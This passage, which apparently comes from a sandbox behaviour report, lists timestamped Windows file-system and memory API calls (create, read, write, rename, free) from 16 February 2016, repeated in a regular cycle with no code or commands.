"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,478", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,478", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,488", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,498", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,508", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,508", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,518", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,528", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,538", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,568", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,568", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,578", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,578", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,588", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,588", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,618", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,658", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,698", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,738", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,758", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,808", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,818", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,878", "api": "NtFreeVirtualMemory"}, 